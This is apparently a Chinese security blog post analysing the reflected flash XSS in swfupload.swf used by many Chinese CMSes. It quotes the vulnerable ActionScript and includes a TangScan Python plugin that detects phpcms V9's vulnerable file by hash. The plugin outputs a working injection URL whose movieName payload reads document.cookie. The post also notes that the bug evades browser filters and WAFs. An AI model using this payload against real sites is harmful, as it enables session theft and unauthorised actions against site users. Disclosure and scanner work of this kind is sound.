最近看到WooYun-2014-69833报告中对swfupload.swf、uploadify.swf造成的flash xss 分析,由于涉及范围广（国内各大cms厂商，包括但不限于dedecms、phpcms、cmseasy、espcms、phpyun、thinksns、骑士人才系统、phpdisk、国微php168、phpok、kesioncms、pageadmin、xheditor、sdcms、emlog、dtcms等）命中率应该还可以，便给Tangscan提交了几个此类型插件，这里也分享一下代码。

先看下漏洞成因

this.movieName = root.loaderInfo.parameters.movieName;

            this.flashReady_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].flashReady");

            this.fileDialogStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogStart");

            this.fileQueued_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueued");

            this.fileQueueError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueueError");

            this.fileDialogComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogComplete");

            this.uploadStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadStart");

            this.uploadProgress_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadProgress");

            this.uploadError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadError");

            this.uploadSuccess_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadSuccess");

            this.uploadComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadComplete");

            this.debug_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].debug");

            this.testExternalInterface_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].testExternalInterface");

            this.cleanUp_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].cleanUp");

代码可见，从参数（root.loaderInfo.parameters.movieName）中获得movieName后直接赋值到一些callback响应函数中，这些函数是js中执行的内容。我们只需闭合前面的”]，再闭合try..catch中大括号}，即可执行自己的javascript代码，造成反射型XSS。

因为是flash xss，而且没有过多关键字，所以无视浏览器filter和大部分WAF（因为在前端运行），所以影响较大，轻则越权操作、产生XSS、csrf蠕虫，重则直接getshell（结合某些cms的后台getshell技巧）。

分享下phpcms V9 /swfupload.swf XSS POC

TangScan-ID：TS-2014-17843

#! /usr/bin/env python
# -*- coding: utf-8 -*-

import md5
from thirdparty import requests
from modules.exploit import TSExploit


class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "phpcms V9 /swfupload.swf XSS",
            "product": "phpcmsv9",
            "product_version": "",
            "desc": """
            phpcms V9 /swfupload.swf XSS
            """,
            "license": self.license.TS,
            "author": ["侦探911"],
            "ref": [
                {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2014-069833"},
            ],
            "type": self.type.xss,
            "severity": self.severity.low,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": ""
            }
        })
        self.register_result({
            "status": False,
            "data": {

            },
            "description": "",
            "error": ""
        })

    def md5(self, content):
        return md5.new(content).hexdigest()

    def verify(self):
        flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
        exp_url = "{domain}/statics/js/swfupload/swfupload.swf".format(domain=self.option.url.rstrip('/'))

        try:
            response = requests.get(exp_url, verify=False, timeout=15)
        except Exception, e:
            self.result.error = str(e)
            return

        if self.md5(response.content) == flash_md5:
            self.result.status = True
            self.result.description = "目标 {url} 存在反射XSS, 验证url: {verify_url}".format(
                url=self.option.url,
                verify_url=exp_url + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//"
            )

    def exploit(self):
        self.verify()


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())

标签： python

Hduoj用户AC题数统计爬虫

xlrd基本操作并配合matplotlib绘图笔记

Pandas基本操作笔记

Matplotlib基本图形笔记

matplotlib基本绘图笔记

numpy常用操作笔记

S2-032 远程命令执行 (POC@Tangscan)

谈谈CVE-2012-0053

0x00 前言

0x01 漏洞描述

0x02 漏洞分析

nmap from python

0x01 About

Tangscan插件之phpcms V9 /swfupload.swf XSS